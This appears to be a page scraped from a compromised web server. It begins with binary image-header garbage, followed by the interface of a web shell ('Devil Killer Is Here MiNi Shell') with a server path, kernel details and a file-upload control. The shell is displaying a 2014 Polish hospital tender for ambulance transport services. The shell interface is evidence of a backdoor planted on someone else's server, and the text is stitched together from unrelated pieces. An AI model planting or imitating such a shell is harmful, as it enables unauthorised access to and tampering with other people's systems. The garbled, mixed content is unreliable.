JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/220125-N-2014.html

<p class="kh_header"><b>Poznań: Usługa z zakresu transportu sanitarnego karetkami typu S i typu P</b><br>
<b>Numer ogłoszenia: 220125 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa z zakresu transportu sanitarnego karetkami typu S i typu P.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.     Przedmiot  zamówienia
Świadczenie przez Wykonawcę na rzecz Zamawiającego usługi transportu sanitarnego karetkami typu S i typu P określonej w 2 częściach zamówienia: 

Część Nr 1:  Transport  karetką specjalistyczną S
Przewóz pacjentów w pozycji leżącej, siedzącej lub na wózku inwalidzkim karetką S z co najmniej trzema osobami uprawnionymi do wykonywania medycznych czynności ratunkowych, w tym lekarz systemu oraz pielęgniarka systemu lub ratownik medyczny z siedziby Zamawiającego w Poznaniu, przy ul. Polnej 33,  na wezwanie, we wszystkie dni tygodnia  
i  o  każdej porze.
Przewidywana szacunkowa  ilość  godz. z lekarzem: 190 / na dwa lata
Przewidywana szacunkowa ilość km z lekarzem: 2 850 / na dwa lata

Część Nr 2:  Transport karetką podstawową  P 
Przewóz  pacjentów w pozycji leżącej lub siedzącej lub na wózku inwalidzkim na wezwanie karetką P, z co najmniej  dwoma osobami uprawnionymi do wykonywania  medycznych czynności ratunkowych o kwalifikacji pielęgniarka systemu lub ratownik medyczny z siedziby Zamawiającego w Poznaniu, przy ul. Polnej 33  we wszystkie dni tygodnia i o każdej porze.
Przewidywana szacunkowa  ilość godz. z  ratownikiem:  220 / na dwa lata
Przewidywana szacunkowa ilość km z  ratownikiem: 3 120 / na dwa lata

2.	Wymagania Zamawiającego w odniesieniu do przedmiotu zamówienia:
2.1	Wykonawca zobowiązuje się do świadczenia usług przewozu  pacjentów przez całą dobę, we wszystkie dni tygodnia, na każdorazowe zgłoszenie telefoniczne Zamawiającego.
2.2	Wykonawca zobowiązany jest do stawienia się w siedzibie Zamawiającego w  ciągu 15 minut od momentu przyjęcia zgłoszenia do realizacji w przypadku świadczenia usług wskazanych w Części Nr 1,  w ciągu 60 minut  w przypadku  świadczenia usługi wskazanej w Części Nr 2. Wydłużenie w/w czasu na przybycie pojazdu Wykonawcy wymaga bezwzględnie uzgodnienia i akceptacji osoby zamawiającej transport. Zamawiający zastrzega sobie możliwość zlecenia usługi z wyprzedzeniem czasowym.
2.3	Naliczanie czasu realizacji usługi transportu sanitarnego rozpoczyna się w momencie odbioru pacjenta od  Zamawiającego.
2.4	W ramach usługi przewozu Wykonawca zobowiązany jest do odbioru pacjenta z oddziału Szpitala (wraz z ewentualną pomocą przy przeniesieniu pacjenta) oraz doprowadzenie (ewentualne wniesienie) do miejsca wskazanego przez Zamawiającego.
2.5	Realizacja usługi na  podstawie  pisemnego  zlecenia  Zamawiającego,  podpisanego  przez lekarza , ze wskazaniem formy przewozu -  karetka  S  lub  P.  Zlecenie usługi na druku obowiązującym w Szpitalu ZLECENIE NA TRANSPORT , które w celu prawidłowego rozliczenia usługi musi zawierać: godzinę  odbioru pacjenta, godzinę przekazania pacjenta w przypadku transportu w jedną stronę, godzinę ponownego przyjęcia pacjenta na oddział, ilość  przejechanych kilometrów.  
2.6	Realizacja usługi  według możliwie najkrótszej drogi przewozu. Stawka za km liczona jest od miejsca rozpoczęcia transportu do miejsca docelowego najkrótszą drogą. W stawkę wkalkulowany jest koszt dojazdu do siedziby Zamawiającego a także koszt powrotu do bazy. Stawka godzinowa wyliczona wg następujących zasad:  każdorazowo po rozpoczęciu usługi  transport do 1 godziny liczony jest jako 1 pełna  godzina, w pozostałych przypadkach 
(począwszy od 2 godziny wykonywania usługi)  obowiązuje zasad zaokrąglania - czas poniżej 30 minut pomija się, 
a powyżej 30 minut zaokrąglą się do 1 godziny.
2.7	Wymagania dotyczące środków transportu:
a.	transport  odbywać się będzie pojazdami wyposażonymi zgodne z  obowiązującą Polską Normą przenoszącą europejskie normy zharmonizowane PN-EN 1789 określającą wymagania dla odpowiednich typów ambulansów drogowych oraz ustawą z dnia 8 września 2006r. o Państwowym Ratownictwie Medycznym.
Skład zespołu transportu zgodny z definicją zawartą w art. 36 ust. 1 ustawy o  Państwowym Ratownictwie Medycznym,
b.	realizacja usługi pojazdem sprawnym technicznie, spełniającym wymogi sanitarne, przystosowanym jako pojazd uprzywilejowany, posiadającym ważne pozwolenie na używanie niebieskich sygnałów świetlnych i dźwiękowych, wyposażonym w kompletny zestaw leków i aparaturę medyczną  zgodnie z  obowiązującymi przepisami prawa,
c.	do przewozu pacjentów chodzących  pojazd z co najmniej dwoma miejscami siedzącymi, oprócz miejsc dla kierowcy i sanitariusza,
d.	realizacja sprawnym  technicznie  pojazdem, posiadającym aktualną opinię sanitarną i badania techniczne oraz aktualne ubezpieczenie OC i  NW,
e.	w przypadku  wystąpienia awarii  środka  przewidzianego  do  realizacji  umowy,  Wykonawca  na  własny  koszt  zapewni  zastępczy  środek  transportu  o  takim  samym  standardzie  technicznym.

2.8	Spełnianie przez osoby uprawnione do wykonywania medycznych czynności ratunkowych wymogów określonych w ustawie  z dnia  8 września 2006r. o Państwowym Ratownictwie Medycznym  (Dz. U. z 2006r.  Nr 191 poz. 1410  z późn. zm.).
2.9	Zamawiający wymaga realizacji usługi zgodnie z obowiązującymi przepisami, a w szczególności reżimami sanitarnymi.
2.10 Zapewnienie bezpieczeństwa przewożonym osobom i mieniu.
2.11 Zapewnienie stałej łączności radiowej z pojazdami  S  i P.
2.12 Posiadanie  telefonów  sieci  komórkowej  w  celu  utrzymania  stałej  łączności  ze  szpitalem.
2.13 Przestrzeganie  przepisów  bezpieczeństwa  uwzględniających  specyfikę  wykonywanej  usługi.
2.14 W przypadku pojawienia się wymogów stawianych Zamawiającemu przez NFZ dotyczących informacji o Wykonawcy świadczącym usługi, Wykonawca zobowiązuje się na wniosek Zamawiającego  stosować do tych wymogów i udostępnić niezbędne dane..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia  wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, kiedy wykaże się posiadaniem aktualnego zezwolenia na prowadzenie działalności z zakresu usług transportu sanitarnego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje dwie usługi odpowiadające przedmiotowi zamówienia 
i wartości  każdej  z  nich nie  mniejszej  niż:
-29 200,00 zł brutto w odniesieniu do Części Nr 1
-24 400,00 zł brutto w odniesieniu do Części Nr 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że ma dostęp do: 
sprzętu do wykonania usługi tj. do minimum dwóch karetek typu S (w przypadku Części Nr 1) i minimum dwóch karetek typu P (w przypadku Części Nr 2), wyposażonych zgodnie z obowiązującą Polską Normą przenoszącą europejskie normy zharmonizowane PN-EN 1789 określającą wymagania dla odpowiednich typów ambulansów drogowych oraz ustawą z dnia 8 września 2006r. o  Państwowym Ratownictwie Medycznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że ma dostęp do:	osób uprawnionych do wykonywania medycznych czynności ratunkowych zgodnie z wymogami określonymi w ustawie  z dnia  8 września 2006r. o Państwowym Ratownictwie Medycznym  (Dz. U. z 2006r.  Nr 191 poz. 1410  z  późn. zm.) oraz spełniających wymagania ustawy z dnia 5 stycznia 2011r. o kierujących pojazdami (Dz. U. z 2011r. Nr 30, poz. 151 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI, pkt. 1.1 specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający wymaga  przedstawienia  wraz  z  ofertą w szczególności:
a.	Oświadczenia, że budowa oraz wyposażenie karetek jest zgodne z obowiązującą Polską Normą przenoszącą europejskie normy zharmonizowane PN-EN 1789 określającą wymagania dla odpowiednich typów ambulansów drogowych oraz ustawą z dnia 8 września 2006r. o Państwowym Ratownictwie Medycznym,
b.	Aktualnego dokumentu zezwalającego na posiadanie i używanie niebieskiej sygnalizacji świetlno-dźwiękowej dla pojazdów uprzywilejowanych,
c.	Oświadczenia  potwierdzającego  spełnianie wymagań sanitarnych przez środki transportu przewidziane do realizacji usługi.
Dowody  należytego  wykonania lub wykonywania usług:
-	poświadczenia, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno  być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert  lub
-	oświadczenia Wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca  nie jest w stanie uzyskać poświadczenia , o którym mowa  w pkt. 1.3.1 specyfikacji
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa w pkt. 1.2 specyfikacji, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów o których mowa w pkt. 1.3 specyfikacji.

Jeżeli wykaz lub dowody, o których mowa w pkt. 1.2  i pkt. 1.3 budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.
Wykonawca powołujący się przy wykazywaniu spełnienia warunku udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia przedkłada pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
W celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, będzie zobowiązany złożyć stosowne dokumenty dotyczące:
a.  zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b.  sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia,
c.  charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d.  zakresu i  okresu udziału innego podmiotu w wykonywaniu zamówienia.
Oferta wspólna / konsorcjum
1.	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez  dwóch lub więcej Wykonawców, w ofercie musi zostać złożone oświadczenie z art. 22 ust. 1 ustawy i podpisane przez tych Wykonawców, którzy spełniają postawione warunki.
2.	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, w ofercie  muszą być złożone oświadczenia z art. 24 ust. 1 ustawy  przez każdego z Wykonawców  składających ofertę wspólną lub jedno, podpisane przez wszystkich Wykonawców składających taką ofertę.
3.	Dokumentami potwierdzającymi spełnianie warunków udziału z art. 22 ust. 1 ustawy są: dokumenty złożone przez co najmniej jednego z Wykonawców wspólnie ubiegających  się o udzielenie zamówienia lub dokumenty złożone przez tych Wykonawców, z których wynikać będzie łączne ich  spełnianie.
4.	Dokumenty potwierdzające brak podstaw do wykluczenia z postępowania Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy przedkłada w ofercie każdy z Wykonawców Konsorcjum.
5.	Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu, albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego  (do oferty dołączyć odpowiednie pełnomocnictwo). 
6.	Pełnomocnictwo może być udzielone w szczególności:
	-  łącznie przez wszystkich Wykonawców (jeden dokument)
	- oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców)
7.	Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. 
8.	Wykonawcy wspólnie ubiegający się  o zamówienie, których oferta zostanie uznana za  najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani  przedstawić Zamawiającemu umowę  regulującą współpracę tych podmiotów zawierającą następujące postanowienia:
a.	określenie celu  gospodarczego,
b.	określenie, który z podmiotów jest upoważniony do występowania w imieniu pozostałych przy realizacji zamówienia,
c.	oznaczenie czasu trwania obejmującego okres realizacji przedmiotu zamówienia,
d.	zakaz zmian w umowie bez zgody Zamawiającego.
Nie dopuszcza się składania umowy przedwstępnej lub umowy zawartej pod warunkiem zawieszającym.
Podwykonawcy 
1.   Definicja umowy o podwykonawstwo zgodnie z art. 2  pkt. 9a ustawy - Pzp
Umowa o podwykonawstwo - umowa w formie pisemnej o charakterze odpłatnym, której przedmiotem są usługi, dostawy lub roboty budowlane stanowiące część zamówienia publicznego, zawarta między wybranym przez  zamawiającego wykonawcą  a innym podmiotem (podwykonawcą), a w przypadku zamówień publicznych na roboty budowlane także między podwykonawcą a dalszym podwykonawcą lub między dalszymi podwykonawcami.
2.	Wykonawca może  powierzyć wykonanie części zamówienia podwykonawcy.
3.	Zamawiający żąda  wskazania  przez Wykonawcę w Załączniku Nr 3 do SIWZ (Formularz Oferty)  części zamówienia, której wykonanie zamierza  powierzyć podwykonawcy oraz podania przez Wykonawcę nazw (firm)  podwykonawców, na których zasoby Wykonawca powołuje się na zasadach  określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art.  22 ust. 1.
4.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
5.	Za prace zrealizowane  przez Podwykonawców Wykonawca będzie odpowiadał jak za własne.
OPIS SPOSOBU PRZYGOTOWANIA OFERT
1.	Wymagania  ogólne
1.1	Wykonawca  może  złożyć tylko  jedną  kompletną  ofertę.
1.2	Oferta  musi  być  złożona  w  formie  pisemnej,  zgodnie  z  wymaganiami  opisanymi  w   niniejszej  specyfikacji.
1.3	Oferta winna  być sporządzona w języku  polskim, na  maszynie  do  pisania,  komputerze lub  inną  trwałą,  czytelną techniką.  Złożone  materiały  powinny  być  spięte,  wszystkie  strony  oferty  zawierające  jakąkolwiek  treść  winny  być  ponumerowane, podpisane  przez  upoważnionego  przedstawiciela  Wykonawcy  i  opatrzone  pieczątką.  
Strony puste nie wymagają  numeracji,  podpisów  i  pieczątek.  Ewentualne  poprawki  w  tekście oferty  muszą  być  naniesione  w  czytelny  sposób,  parafowane  i  datowane  własnoręcznie  przez  osobę  podpisującą  ofertę.
1.4	Dokumenty sporządzone w języku obcym należy złożyć  wraz  z  tłumaczeniem  na  język  polski.
2.	Zawartość  oferty  i  sposób  jej  przedstawienia
2.1	Ofertę stanowi wypełniony formularz  Oferta,  Załącznik  Nr  2   do  specyfikacji oraz niżej wymienione dokumenty:
a.     Formularz specyfikacji cenowej  -  Załącznik Nr 1 do specyfikacji
2.2	Wraz z ofertą  należy złożyć:
a.	Oświadczenia i dokumenty  wskazane  w  rozdziale VI  specyfikacji.
b.	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.
c.	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której wynikać będzie przedmiotowe pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza). Pełnomocnik  może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.
2.3	Oferta wraz z załącznikami musi być podpisana przez osobę  upoważnioną  do  reprezentowania  Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy.
3.	Opakowanie  oferty
3.1	Wykonawca  umieszcza  ofertę  w  nieprzejrzystym,  zamkniętym  opakowaniu,  które:
a)	będzie  zaadresowane  na  Zamawiającego,
b)	będzie posiadać oznaczenia: Oferta na usługę z zakresu transportu sanitarnego karetkami typu S i typu P. Otwiera Komisja przetargowa dnia: 28.10.2014r. o godz. 09:30.
3.1	W przypadku załączenia do oferty dokumentów, których Zamawiający nie żąda zalecane jest ich oddzielenie od oferty i oznaczenie napisem Dokumenty uzupełniające. 
4.	Tajemnica przedsiębiorstwa
4.1	Zamawiający informuje, iż  zgodnie  z  art. 8  w  zw. z  art.  96  ust. 3  ustawy oferty  składane  w  postępowaniu  o zamówienie publiczne są jawne i podlegają udostępnieniu od chwili ich otwarcia, z wyjątkiem informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeśli Wykonawca, zastrzegł, że nie mogą one być udostępniane.
